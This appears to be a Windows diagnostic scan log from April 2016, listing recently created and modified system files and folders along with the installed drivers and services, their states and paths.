2016-04-12 21:53:01 ----A---- C:\WINDOWS\SYSWOW64\Windows.Networking.Connectivity.dll
2016-04-12 21:52:59 ----A---- C:\WINDOWS\SYSWOW64\MapConfiguration.dll
2016-04-12 21:52:59 ----A---- C:\WINDOWS\system32\Windows.Security.Authentication.Web.Core.dll
2016-04-12 21:52:59 ----A---- C:\WINDOWS\system32\policymanager.dll
2016-04-12 21:52:59 ----A---- C:\WINDOWS\system32\ncbservice.dll
2016-04-12 21:52:59 ----A---- C:\WINDOWS\system32\mdmregistration.dll
2016-04-12 21:52:58 ----A---- C:\WINDOWS\system32\fveui.dll
2016-04-12 21:52:58 ----A---- C:\WINDOWS\system32\drivers\http.sys
2016-04-12 21:52:58 ----A---- C:\WINDOWS\system32\dafBth.dll
2016-04-12 21:52:57 ----A---- C:\WINDOWS\SYSWOW64\TextInputFramework.dll
2016-04-12 21:52:57 ----A---- C:\WINDOWS\system32\Windows.Media.Devices.dll
2016-04-12 21:52:57 ----A---- C:\WINDOWS\system32\drivers\dfsc.sys
2016-04-12 21:52:57 ----A---- C:\WINDOWS\system32\accountaccessor.dll
2016-04-12 21:52:56 ----A---- C:\WINDOWS\system32\Windows.Networking.dll
2016-04-12 21:52:56 ----A---- C:\WINDOWS\system32\SystemSettingsAdminFlows.exe
2016-04-12 21:52:56 ----A---- C:\WINDOWS\system32\samsrv.dll
2016-04-12 21:52:56 ----A---- C:\WINDOWS\system32\omadmapi.dll
2016-04-12 21:52:56 ----A---- C:\WINDOWS\system32\enrollmentapi.dll
2016-04-12 21:52:55 ----A---- C:\WINDOWS\system32\MosStorage.dll
2016-04-12 21:52:55 ----A---- C:\WINDOWS\system32\mdmmigrator.dll
2016-04-12 21:52:54 ----A---- C:\WINDOWS\SYSWOW64\srvcli.dll
2016-04-12 21:52:54 ----A---- C:\WINDOWS\SYSWOW64\AboveLockAppHost.dll
2016-04-12 21:52:54 ----A---- C:\WINDOWS\system32\SyncController.dll
2016-04-12 21:52:53 ----A---- C:\WINDOWS\SYSWOW64\mdmregistration.dll
2016-04-12 21:52:53 ----A---- C:\WINDOWS\system32\srvcli.dll
2016-04-12 21:52:53 ----A---- C:\WINDOWS\system32\netapi32.dll
2016-04-12 21:52:52 ----A---- C:\WINDOWS\SYSWOW64\Windows.Devices.Bluetooth.dll
2016-04-12 21:52:52 ----A---- C:\WINDOWS\SYSWOW64\netapi32.dll
2016-04-12 21:52:52 ----A---- C:\WINDOWS\system32\NetSetupApi.dll
2016-04-12 21:52:51 ----A---- C:\WINDOWS\SYSWOW64\wuapi.dll
2016-04-12 21:52:51 ----A---- C:\WINDOWS\SYSWOW64\Windows.Media.Devices.dll
2016-04-12 21:52:51 ----A---- C:\WINDOWS\SYSWOW64\VEDataLayerHelpers.dll
2016-04-12 21:52:51 ----A---- C:\WINDOWS\system32\wkscli.dll
2016-04-12 21:52:50 ----A---- C:\WINDOWS\SYSWOW64\wkscli.dll
2016-04-12 21:52:50 ----A---- C:\WINDOWS\system32\iuilp.dll
2016-04-12 21:52:50 ----A---- C:\WINDOWS\system32\drivers\sdbus.sys
2016-04-12 21:52:49 ----A---- C:\WINDOWS\SYSWOW64\NetSetupApi.dll
2016-04-12 21:52:49 ----A---- C:\WINDOWS\system32\drivers\WdiWiFi.sys
2016-04-12 21:52:49 ----A---- C:\WINDOWS\system32\drivers\nwifi.sys
2016-04-12 21:52:49 ----A---- C:\WINDOWS\system32\BitLockerDeviceEncryption.exe
2016-04-12 21:52:48 ----A---- C:\WINDOWS\SYSWOW64\SensorsNativeApi.dll
2016-04-12 21:52:48 ----A---- C:\WINDOWS\SYSWOW64\JpMapControl.dll
2016-04-12 21:52:48 ----A---- C:\WINDOWS\system32\oleacc.dll
2016-04-12 21:52:48 ----A---- C:\WINDOWS\system32\easinvoker.exe
2016-04-12 21:52:48 ----A---- C:\WINDOWS\system32\drivers\cng.sys
2016-04-12 21:52:47 ----A---- C:\WINDOWS\SYSWOW64\WSDApi.dll
2016-04-12 21:52:47 ----A---- C:\WINDOWS\SYSWOW64\MosStorage.dll
2016-04-12 21:52:47 ----A---- C:\WINDOWS\system32\win32spl.dll
2016-04-12 21:52:47 ----A---- C:\WINDOWS\system32\SensorsNativeApi.dll
2016-04-12 21:52:47 ----A---- C:\WINDOWS\system32\ieproxy.dll
2016-04-12 21:52:47 ----A---- C:\WINDOWS\system32\drivers\dumpsd.sys
2016-04-12 21:52:46 ----A---- C:\WINDOWS\SYSWOW64\oleacc.dll
2016-04-12 21:52:46 ----A---- C:\WINDOWS\system32\wsdchngr.dll
2016-04-12 21:52:46 ----A---- C:\WINDOWS\system32\DAFWSD.dll
2016-04-12 21:52:45 ----A---- C:\WINDOWS\SYSWOW64\Windows.Networking.dll
2016-04-12 21:52:45 ----A---- C:\WINDOWS\system32\IKEEXT.DLL
2016-04-12 21:52:45 ----A---- C:\WINDOWS\system32\dnsrslvr.dll
2016-04-12 21:52:44 ----A---- C:\WINDOWS\SYSWOW64\VEEventDispatcher.dll
2016-04-12 21:52:44 ----A---- C:\WINDOWS\system32\TextInputFramework.dll
2016-04-12 21:52:44 ----A---- C:\WINDOWS\system32\credprovhost.dll
2016-04-12 21:52:41 ----A---- C:\WINDOWS\system32\VEStoreEventHandlers.dll
2016-04-12 21:52:41 ----A---- C:\WINDOWS\system32\easwrt.dll
2016-04-12 21:52:41 ----A---- C:\WINDOWS\system32\dmcsps.dll
2016-04-12 21:52:41 ----A---- C:\WINDOWS\system32\browserbroker.dll
2016-04-12 21:52:40 ----A---- C:\WINDOWS\SYSWOW64\wsdchngr.dll
2016-04-12 21:52:40 ----A---- C:\WINDOWS\SYSWOW64\NotificationObjFactory.dll
2016-04-12 21:52:40 ----A---- C:\WINDOWS\system32\wuautoappupdate.dll
2016-04-12 21:52:40 ----A---- C:\WINDOWS\system32\VEEventDispatcher.dll
2016-04-12 21:52:40 ----A---- C:\WINDOWS\system32\NotificationObjFactory.dll
2016-04-12 21:52:39 ----A---- C:\WINDOWS\SYSWOW64\ieproxy.dll
2016-04-12 21:52:39 ----A---- C:\WINDOWS\SYSWOW64\credprovhost.dll
2016-04-12 21:52:39 ----A---- C:\WINDOWS\system32\WSDApi.dll
2016-04-12 21:52:39 ----A---- C:\WINDOWS\system32\tzautoupdate.dll
2016-04-12 21:52:38 ----A---- C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll
2016-04-12 21:52:38 ----A---- C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2016-04-12 21:52:37 ----A---- C:\WINDOWS\SYSWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2016-04-12 21:52:37 ----A---- C:\WINDOWS\system32\FWPUCLNT.DLL
2016-04-12 21:52:37 ----A---- C:\WINDOWS\system32\basesrv.dll
2016-04-12 21:52:37 ----A---- C:\WINDOWS\system32\actxprxy.dll
2016-04-12 21:52:36 ----A---- C:\WINDOWS\SYSWOW64\browcli.dll
2016-04-12 21:52:36 ----A---- C:\WINDOWS\system32\OnDemandConnRouteHelper.dll
2016-04-12 21:52:36 ----A---- C:\WINDOWS\system32\fvewiz.dll
2016-04-12 21:52:36 ----A---- C:\WINDOWS\system32\browser.dll
2016-04-12 21:52:36 ----A---- C:\WINDOWS\system32\browcli.dll
2016-04-12 21:52:35 ----A---- C:\WINDOWS\SYSWOW64\msorcl32.dll
2016-04-12 21:52:35 ----A---- C:\WINDOWS\system32\LicenseManagerShellext.exe
2016-04-12 21:52:34 ----A---- C:\WINDOWS\SYSWOW64\Windows.Security.Authentication.Web.Core.dll
2016-04-12 21:52:34 ----A---- C:\WINDOWS\SYSWOW64\SyncController.dll
2016-04-12 21:52:34 ----A---- C:\WINDOWS\system32\fvecpl.dll
2016-04-12 21:52:33 ----A---- C:\WINDOWS\SYSWOW64\easwrt.dll
2016-04-12 21:52:33 ----A---- C:\WINDOWS\system32\tbauth.dll
2016-04-12 21:52:33 ----A---- C:\WINDOWS\system32\fveskybackup.dll
2016-04-12 21:52:33 ----A---- C:\WINDOWS\system32\BFE.DLL
2016-04-12 21:52:32 ----A---- C:\WINDOWS\system32\wininetlui.dll
2016-04-12 21:52:32 ----A---- C:\WINDOWS\system32\jsproxy.dll
2016-04-12 21:52:32 ----A---- C:\WINDOWS\system32\drivers\serial.sys
2016-04-12 21:52:31 ----A---- C:\WINDOWS\system32\samlib.dll
2016-04-12 21:52:30 ----A---- C:\WINDOWS\SYSWOW64\wininetlui.dll
2016-04-12 21:52:30 ----A---- C:\WINDOWS\SYSWOW64\jsproxy.dll
2016-04-12 21:52:30 ----A---- C:\WINDOWS\system32\wups.dll
2016-04-12 21:52:30 ----A---- C:\WINDOWS\system32\SystemSettings.DeviceEncryptionHandlers.dll
2016-04-12 21:52:29 ----A---- C:\WINDOWS\SYSWOW64\Windows.UI.Core.TextInput.dll
2016-04-12 21:52:29 ----A---- C:\WINDOWS\SYSWOW64\TokenBrokerCookies.exe
2016-04-12 21:52:29 ----A---- C:\WINDOWS\SYSWOW64\tbauth.dll
2016-04-12 21:52:29 ----A---- C:\WINDOWS\SYSWOW64\FWPUCLNT.DLL
2016-04-12 21:52:29 ----A---- C:\WINDOWS\system32\TokenBrokerCookies.exe
2016-04-12 21:52:29 ----A---- C:\WINDOWS\system32\moshost.dll
2016-04-12 21:52:29 ----A---- C:\WINDOWS\system32\FontProvider.dll
2016-04-12 21:52:28 ----A---- C:\WINDOWS\system32\SensorsNativeApi.V2.dll
2016-04-12 21:52:28 ----A---- C:\WINDOWS\system32\mapsupdatetask.dll
2016-04-12 21:52:28 ----A---- C:\WINDOWS\system32\drivers\portcls.sys
2016-04-12 21:52:27 ----A---- C:\WINDOWS\system32\mos.dll
2016-04-12 21:52:27 ----A---- C:\WINDOWS\system32\dmenterprisediagnostics.dll
2016-04-12 21:52:26 ----A---- C:\WINDOWS\SYSWOW64\mos.dll
2016-04-12 21:52:26 ----A---- C:\WINDOWS\SYSWOW64\actxprxy.dll
2016-04-12 21:52:26 ----A---- C:\WINDOWS\system32\NetCfgNotifyObjectHost.exe
2016-04-12 21:52:26 ----A---- C:\WINDOWS\system32\MapsBtSvc.dll
2016-04-12 21:52:25 ----A---- C:\WINDOWS\SYSWOW64\samlib.dll
2016-04-12 21:52:25 ----A---- C:\WINDOWS\SYSWOW64\mtxoci.dll
2016-04-12 21:52:25 ----A---- C:\WINDOWS\system32\mtxoci.dll
2016-04-12 21:52:25 ----A---- C:\WINDOWS\system32\MapsCSP.dll
2016-04-12 21:52:25 ----A---- C:\WINDOWS\system32\fveapibase.dll
2016-04-12 21:52:25 ----A---- C:\WINDOWS\system32\BdeHdCfgLib.dll
2016-04-12 21:52:24 ----A---- C:\WINDOWS\SYSWOW64\SensorsNativeApi.V2.dll
2016-04-12 21:52:24 ----A---- C:\WINDOWS\SYSWOW64\OnDemandConnRouteHelper.dll
2016-04-12 21:52:24 ----A---- C:\WINDOWS\SYSWOW64\NMAA.dll
2016-04-12 21:52:24 ----A---- C:\WINDOWS\system32\oleacchooks.dll
2016-04-12 21:52:23 ----A---- C:\WINDOWS\SYSWOW64\oleacchooks.dll
2016-04-12 21:52:23 ----A---- C:\WINDOWS\SYSWOW64\MapsBtSvc.dll
2016-04-12 21:52:23 ----A---- C:\WINDOWS\system32\InputLocaleManager.dll
2016-04-12 21:52:23 ----A---- C:\WINDOWS\system32\fontsub.dll
2016-04-12 21:52:22 ----A---- C:\WINDOWS\SYSWOW64\InstallAgent.exe
2016-04-12 21:52:22 ----A---- C:\WINDOWS\SYSWOW64\InputLocaleManager.dll
2016-04-12 21:52:22 ----A---- C:\WINDOWS\system32\InstallAgent.exe
2016-04-12 21:52:22 ----A---- C:\WINDOWS\system32\drivers\xinputhid.sys
2016-04-12 21:52:22 ----A---- C:\WINDOWS\system32\bcastdvr.exe
2016-04-12 21:52:22 ----A---- C:\WINDOWS\system32\AppCapture.dll
2016-04-12 21:52:21 ----A---- C:\WINDOWS\SYSWOW64\fontsub.dll
2016-04-12 21:52:21 ----A---- C:\WINDOWS\system32\MTF.dll
2016-04-12 21:52:21 ----A---- C:\WINDOWS\system32\Chakradiag.dll
2016-04-12 21:52:20 ----A---- C:\WINDOWS\SYSWOW64\MTF.dll
2016-04-12 21:52:20 ----A---- C:\WINDOWS\SYSWOW64\atmlib.dll
2016-04-12 21:52:20 ----A---- C:\WINDOWS\system32\atmlib.dll
2016-04-09 02:06:04 ----D---- C:\ProgramData\b2bd49a5-37a1-0
2016-04-09 02:06:03 ----D---- C:\ProgramData\b2bd49a5-02e1-1
2016-04-09 02:05:54 ----D---- C:\Users\Administrator\AppData\Roaming\One System Care
2016-04-09 02:05:54 ----D---- C:\Program Files (x86)\OneSystemCare
2016-03-17 23:28:12 ----AD---- C:\Program Files (x86)\iCare Data Recovery
2016-03-17 01:44:59 ----D---- C:\Users\Administrator\AppData\Roaming\MCorp

======List of files/folders modified in the last 1 month======

2016-04-15 21:08:00 ----D---- C:\WINDOWS\Prefetch
2016-04-15 21:07:56 ----D---- C:\Program Files\trend micro
2016-04-15 21:07:24 ----D---- C:\WINDOWS\Temp
2016-04-15 21:03:28 ----D---- C:\ProgramData\DivX
2016-04-15 21:03:28 ----D---- C:\Program Files (x86)\DivX
2016-04-15 21:03:25 ----D---- C:\Users\Administrator\AppData\Roaming\DivX
2016-04-15 21:03:23 ----D---- C:\Program Files\DivX
2016-04-15 21:03:17 ----D---- C:\WINDOWS\SysWOW64
2016-04-15 21:02:04 ----RD---- C:\Program Files
2016-04-15 21:01:28 ----D---- C:\Program Files (x86)\Wondershare
2016-04-15 21:01:27 ----RD---- C:\Program Files (x86)
2016-04-15 20:55:07 ----D---- C:\WINDOWS\System32
2016-04-15 20:55:07 ----D---- C:\WINDOWS\INF
2016-04-15 20:55:07 ----A---- C:\WINDOWS\system32\PerfStringBackup.INI
2016-04-15 20:47:35 ----A---- C:\WINDOWS\SYSWOW64\LOCALSERVICE.INI
2016-04-15 20:46:53 ----A---- C:\WINDOWS\SYSWOW64\bscs.ini
2016-04-15 20:45:48 ----D---- C:\WINDOWS\system32\sru
2016-04-15 20:44:35 ----D---- C:\WINDOWS\Microsoft.NET
2016-04-15 20:32:34 ----HD---- C:\ProgramData
2016-04-15 20:21:58 ----D---- C:\WINDOWS\system32\config
2016-04-15 20:14:46 ----D---- C:\WINDOWS\AppReadiness
2016-04-15 20:14:26 ----D---- C:\Users\Administrator\AppData\Roaming\Dropbox
2016-04-15 20:04:28 ----D---- C:\WINDOWS\WinSxS
2016-04-15 20:00:35 ----D---- C:\WINDOWS\system32\drivers
2016-04-14 21:16:07 ----D---- C:\WINDOWS\SYSWOW64\en-US
2016-04-14 21:15:58 ----D---- C:\WINDOWS\system32\WinBioPlugIns
2016-04-14 21:15:58 ----D---- C:\WINDOWS\system32\en-US
2016-04-14 21:15:58 ----D---- C:\WINDOWS\system32\Boot
2016-04-14 21:15:57 ----D---- C:\WINDOWS\system32\appraiser
2016-04-14 21:15:55 ----D---- C:\WINDOWS\PolicyDefinitions
2016-04-14 21:15:54 ----D---- C:\WINDOWS\bcastdvr
2016-04-14 21:15:54 ----D---- C:\WINDOWS\AppPatch
2016-04-14 21:15:52 ----D---- C:\WINDOWS\system32\DriverStore
2016-04-14 20:53:17 ----D---- C:\Users\Administrator\AppData\Roaming\vlc
2016-04-14 20:51:48 ----D---- C:\Users\Administrator\AppData\Roaming\Azureus
2016-04-14 20:28:24 ----D---- C:\WINDOWS\CbsTemp
2016-04-14 20:21:56 ----SHD---- C:\WINDOWS\Installer
2016-04-14 20:21:53 ----D---- C:\ProgramData\Microsoft Help
2016-04-14 20:21:29 ----D---- C:\WINDOWS\system32\MRT
2016-04-14 20:11:57 ----A---- C:\WINDOWS\system32\MRT.exe
2016-04-14 19:51:07 ----HD---- C:\Program Files\WindowsApps
2016-04-14 19:49:06 ----D---- C:\WINDOWS\system32\Tasks
2016-04-14 19:49:06 ----AD---- C:\Program Files (x86)\Opera
2016-04-12 21:38:19 ----D---- C:\WINDOWS\system32\catroot2
2016-04-11 20:25:33 ----SHD---- C:\System Volume Information
2016-04-09 02:06:05 ----D---- C:\WINDOWS\Tasks
2016-04-06 19:32:08 ----A---- C:\WINDOWS\SYSWOW64\FlashPlayerApp.exe
2016-03-26 23:17:19 ----AD---- C:\Program Files (x86)\Vuze
2016-03-26 20:22:24 ----D---- C:\Windows
2016-03-17 01:39:59 ----D---- C:\Program Files (x86)\MPC Cleaner
2016-03-16 21:08:31 ----RSD---- C:\WINDOWS\assembly

======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R0 aswRvrt;avast! Revert; C:\WINDOWS\system32\drivers\aswRvrt.sys [2016-02-19 74544]
R0 aswVmm;avast! VM Monitor; C:\WINDOWS\system32\drivers\aswVmm.sys [2016-02-19 287016]
R0 iaStor;@oem1.inf,%*PNP0600.DeviceDesc%;Intel AHCI Controller; C:\WINDOWS\System32\drivers\iaStor.sys [2009-10-02 537112]
R1 aswKbd;aswKbd; C:\WINDOWS\system32\drivers\aswKbd.sys [2013-05-09 22600]
R1 aswRdr;aswRdr; C:\WINDOWS\system32\drivers\aswRdr2.sys [2016-02-19 103064]
R1 aswSnx;aswSnx; C:\WINDOWS\system32\drivers\aswSnx.sys [2016-03-09 1070904]
R1 aswSP;aswSP; C:\WINDOWS\system32\drivers\aswSP.sys [2016-02-24 463744]
R1 DwMirror;DwMirror; C:\WINDOWS\system32\DRIVERS\DamewareMini.sys [2008-03-14 5632]
R1 dwvkbd;@oem22.inf,%dwvkbd64.SvcDesc%;DameWare Virtual Keyboard 64 bit Driver; C:\WINDOWS\system32\DRIVERS\dwvkbd64.sys [2008-03-13 30720]
R1 FileCrypt;@%systemroot%\system32\drivers\filecrypt.sys,-100; C:\WINDOWS\system32\drivers\filecrypt.sys [2015-10-30 87040]
R1 GpuEnergyDrv;@%SystemRoot%\system32\drivers\gpuenergydrv.sys,-100; C:\WINDOWS\System32\drivers\gpuenergydrv.sys [2015-10-30 8192]
R1 MPCKpt;MPCKpt; C:\WINDOWS\system32\DRIVERS\MPCKpt.sys [2016-03-16 60136]
R2 adfs;adfs; C:\WINDOWS\system32\drivers\adfs.sys [2009-06-08 86584]
R2 aswHwid;avast! HardwareID; C:\WINDOWS\system32\drivers\aswHwid.sys [2016-02-19 37656]
R2 aswMonFlt;aswMonFlt; C:\WINDOWS\system32\drivers\aswMonFlt.sys [2016-03-09 107792]
R2 aswStm;aswStm; C:\WINDOWS\system32\drivers\aswStm.sys [2016-02-19 165344]
R2 MMCSS;@%systemroot%\system32\drivers\mmcss.sys,-100; C:\WINDOWS\system32\drivers\mmcss.sys [2015-10-30 47616]
R2 storqosflt;@%SystemRoot%\System32\drivers\storqosflt.sys,-101; C:\WINDOWS\system32\drivers\storqosflt.sys [2015-10-30 78848]
R3 GEARAspiWDM;GEAR ASPI Filter Driver; C:\WINDOWS\system32\DRIVERS\GEARAspiWDM.sys [2009-05-18 34152]
R3 HECIx64;@oem31.inf,%HECI_SvcDesc%;Intel(R) Management Engine Interface; C:\WINDOWS\System32\drivers\HECIx64.sys [2009-09-17 56344]
R3 IntcAzAudAddService;Service for Realtek HD Audio (WDM); C:\WINDOWS\system32\drivers\RTKVHD64.sys [2009-08-31 1992352]
R3 MQAC;@mqutil.dll,-6101; C:\WINDOWS\system32\drivers\mqac.sys [2015-12-18 175616]
R3 NVHDA;@oem6.inf,%NVHDA.SvcDesc%;Service for NVIDIA High Definition Audio Driver; C:\WINDOWS\system32\drivers\nvhda64v.sys [2015-12-03 206120]
R3 nvlddmkm;nvlddmkm; C:\WINDOWS\system32\DRIVERS\nvlddmkm.sys [2015-12-03 12907704]
R3 PGEffect;Pangu effect driver; C:\WINDOWS\system32\DRIVERS\pgeffect.sys [2009-06-22 35008]
R3 rt640x64;@rt640x64.inf,%rt640.Service.DispName%;Realtek RT640 NT Driver; C:\WINDOWS\System32\drivers\rt640x64.sys [2015-10-30 589824]
R3 rtl8192se;@net8192se64.inf,%RTL8192se.Service.DispName%;Realtek Wireless LAN 802.11n PCI-E NIC NT Driver; C:\WINDOWS\System32\drivers\rtl8192se.sys [2015-10-30 1222656]
R3 SmbDrvI;SmbDrvI; C:\WINDOWS\system32\DRIVERS\Smb_driver_Intel.sys [2015-06-12 42696]
R3 SynTP;@oem9.inf,%SynTP.SvcDesc%;Synaptics TouchPad Driver; C:\WINDOWS\system32\DRIVERS\SynTP.sys [2015-06-12 613576]
S0 LSI_SAS2i;LSI_SAS2i; C:\WINDOWS\System32\drivers\lsi_sas2i.sys [2015-10-30 104800]
S0 LSI_SAS3i;LSI_SAS3i; C:\WINDOWS\System32\drivers\lsi_sas3i.sys [2015-10-30 99168]
S0 percsas2i;percsas2i; C:\WINDOWS\System32\drivers\percsas2i.sys [2015-10-30 58208]
S0 percsas3i;percsas3i; C:\WINDOWS\System32\drivers\percsas3i.sys [2015-10-30 58720]
S0 storufs;@storufs.inf,%UfsServiceDesc%;Microsoft Universal Flash Storage (UFS) Driver; C:\WINDOWS\System32\drivers\storufs.sys [2015-10-30 34144]
S3 bcmfn;@bcmfn.inf,%bcmfn.SVCDESC%;bcmfn Service; C:\WINDOWS\System32\drivers\bcmfn.sys [2015-10-30 9728]
S3 buttonconverter;@buttonconverter.inf,%btnconv.SvcDesc%;Service for Portable Device Control devices; C:\WINDOWS\System32\drivers\buttonconverter.sys [2015-10-30 37376]
S3 CapImg;@capimg.inf,%CapImgHid_Service%;HID driver for CapImg touch screen; C:\WINDOWS\System32\drivers\capimg.sys [2015-12-18 117248]
S3 dg_ssudbus;@oem26.inf,%ssud.Service.DeviceDesc%;SAMSUNG Mobile USB Composite Device Driver (DEVGURU Ver.); C:\WINDOWS\system32\DRIVERS\ssudbus.sys [2015-12-08 122160]
S3 genericusbfn;@genericusbfn.inf,%genericusbfn.ServiceName%;Generic USB Function Class; C:\WINDOWS\System32\drivers\genericusbfn.sys [2015-10-30 20992]
S3 hidinterrupt;@hidinterrupt.inf,%HID_Interrupt.SvcDesc%;Common Driver for HID Buttons implemented with interrupts; C:\WINDOWS\System32\drivers\hidinterrupt.sys [2015-10-30 50016]
S3 iai2c;@iai2c.inf,%iai2c.SVCDESC%;Intel(R) Serial IO I2C Host Controller; C:\WINDOWS\System32\drivers\iai2c.sys [2015-10-30 81408]
S3 iaLPSS2i_I2C;@iaLPSS2i_I2C_SKL.inf,%iaLPSS2i_I2C.SVCDESC%;Intel(R) Serial IO I2C Driver v2; C:\WINDOWS\System32\drivers\iaLPSS2i_I2C.sys [2015-10-30 165888]
S3 ibbus;@mlx4_bus.inf,%Ibbus.ServiceDesc%;Mellanox InfiniBand Bus/AL (Filter Driver); C:\WINDOWS\System32\drivers\ibbus.sys [2015-10-30 424800]
S3 IoQos;@%SystemRoot%\system32\drivers\ioqos.sys,-100; C:\WINDOWS\system32\drivers\ioqos.sys [2015-10-30 26624]
S3 JMCR;JMCR; C:\WINDOWS\system32\DRIVERS\jmcr.sys [2009-09-23 144496]
S3 mlx4_bus;@mlx4_bus.inf,%MLX4BUS.ServiceDesc%;Mellanox ConnectX Bus Enumerator; C:\WINDOWS\System32\drivers\mlx4_bus.sys [2015-10-30 705376]
S3 ndfltr;@mlx4_bus.inf,%ndfltr.ServiceDesc%;NetworkDirect Service; C:\WINDOWS\System32\drivers\ndfltr.sys [2015-10-30 76128]
S3 ReFSv1;ReFSv1; C:\WINDOWS\system32\drivers\ReFSv1.sys [2015-10-30 930656]
S3 ssudmdm;@oem25.inf,%ssud.Service.Name%;SAMSUNG Mobile USB Modem Drivers (DEVGURU Ver.); C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [2015-12-08 214832]
S3 TDCMDPST;TOSHIBA Writing Engine Filter Driver; C:\WINDOWS\system32\DRIVERS\tdcmdpst.sys [2009-07-30 27784]

======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R2 AdobeARMservice;Adobe Acrobat Update Service; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [2015-07-07 82128]
R2 AppHostSvc;@%windir%\system32\inetsrv\iisres.dll,-30011; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
R2 avast! Antivirus;Avast Antivirus; C:\Program Files\Alwil Software\Avast5\AvastSvc.exe [2016-02-19 237096]
R2 BlueSoleilCS;BlueSoleilCS; C:\Program Files (x86)\IVT Corporation\BlueSoleil\BlueSoleilCS.exe [2009-09-02 1466476]
R2 c2cautoupdatesvc;Skype Click to Call Updater; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [2016-01-08 1433216]
R2 c2cpnrsvc;Skype Click to Call PNR Service; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [2016-01-08 1773696]
R2 ClickToRunSvc;Microsoft Office ClickToRun Service; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2016-02-09 2828016]
R2 CoreMessagingRegistrar;@%SystemRoot%\system32\coremessaging.dll,-1; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
R2 DiagTrack;@%SystemRoot%\system32\diagtrack.dll,-3001; C:\WINDOWS\System32\svchost.exe [2015-10-30 43944]
R2 DNTUS26;DameWare NT Utilities 2.6; C:\Windows\SYSTEM32\DNTUS26.EXE [2011-12-12 120768]
R2 dwmrcs;DameWare Mini Remote Control; C:\Windows\dwrcs\DWRCS.EXE [2011-12-12 701376]
R2 MPCProtectService;MPC Core Protect Service; C:\Program Files (x86)\MPC Cleaner\MPCProtectService.exe [2016-03-16 350688]
R2 MSMQ;@mqutil.dll,-6102; C:\WINDOWS\system32\mqsvc.exe [2015-12-18 26624]
R2 NetMsmqActivator;@%systemroot%\Microsoft.NET\Framework64\v4.0.30319\ServiceModelInstallRC.dll,-8195; C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2015-10-30 135848]
R2 NetPipeActivator;@%systemroot%\Microsoft.NET\Framework64\v4.0.30319\ServiceModelInstallRC.dll,-8197; C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2015-10-30 135848]
R2 nvsvc;NVIDIA Display Driver Service; C:\WINDOWS\system32\nvvsvc.exe [2015-10-13 933168]
R2 OneSyncSvc_3f297;Sync Host_3f297; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
R2 SynTPEnhService;SynTPEnh Caller Service; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [2015-06-12 246472]
R3 BsHelpCS;BsHelpCS; C:\Program Files (x86)\IVT Corporation\BlueSoleil\BsHelpCS.exe [2009-09-02 192000]
R3 ClipSVC;@%SystemRoot%\system32\ClipSVC.dll,-103; C:\WINDOWS\System32\svchost.exe [2015-10-30 43944]
R3 LicenseManager;@%SystemRoot%\system32\licensemanagersvc.dll,-200; C:\WINDOWS\System32\svchost.exe [2015-10-30 43944]
R3 PimIndexMaintenanceSvc_3f297;Contact Data_3f297; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
R3 StateRepository;@%SystemRoot%\system32\windows.staterepository.dll,-1; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S2 DoSvc;@%systemroot%\system32\dosvc.dll,-100; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S2 gupdate;Google Update Service (gupdate); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-01 144200]
S2 MapsBroker;@%SystemRoot%\System32\moshost.dll,-100; C:\WINDOWS\System32\svchost.exe [2015-10-30 43944]
S2 NetTcpActivator;@%systemroot%\Microsoft.NET\Framework64\v4.0.30319\ServiceModelInstallRC.dll,-8199; C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2015-10-30 135848]
S2 OneSyncSvc;@%SystemRoot%\system32\APHostRes.dll,-10002; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S2 OneSyncSvc_12577d78;Sync Host_12577d78; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S2 OneSyncSvc_1b6073d;Sync Host_1b6073d; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S2 OneSyncSvc_1f4d24ff;Sync Host_1f4d24ff; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S2 OneSyncSvc_2391db7;Sync Host_2391db7; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S2 OneSyncSvc_471b55;Sync Host_471b55; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S2 OneSyncSvc_549d0;Sync Host_549d0; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S2 OneSyncSvc_5b268ed;Sync Host_5b268ed; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S2 OneSyncSvc_9fe0c8f;Sync Host_9fe0c8f; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S2 OneSyncSvc_e5cea;Sync Host_e5cea; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S2 SkypeUpdate;Skype Updater; C:\Program Files (x86)\Skype\Updater\Updater.exe [2014-12-11 315496]
S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service; C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-09-21 269000]
S3 AJRouter;@%SystemRoot%\system32\AJRouter.dll,-2; C:\WINDOWS\system32\svchost.exe [2015-10-30 43944]
S3 aspnet_state;@%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\aspnet_rc.dll,-1; C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe [2015-10-30 51376]
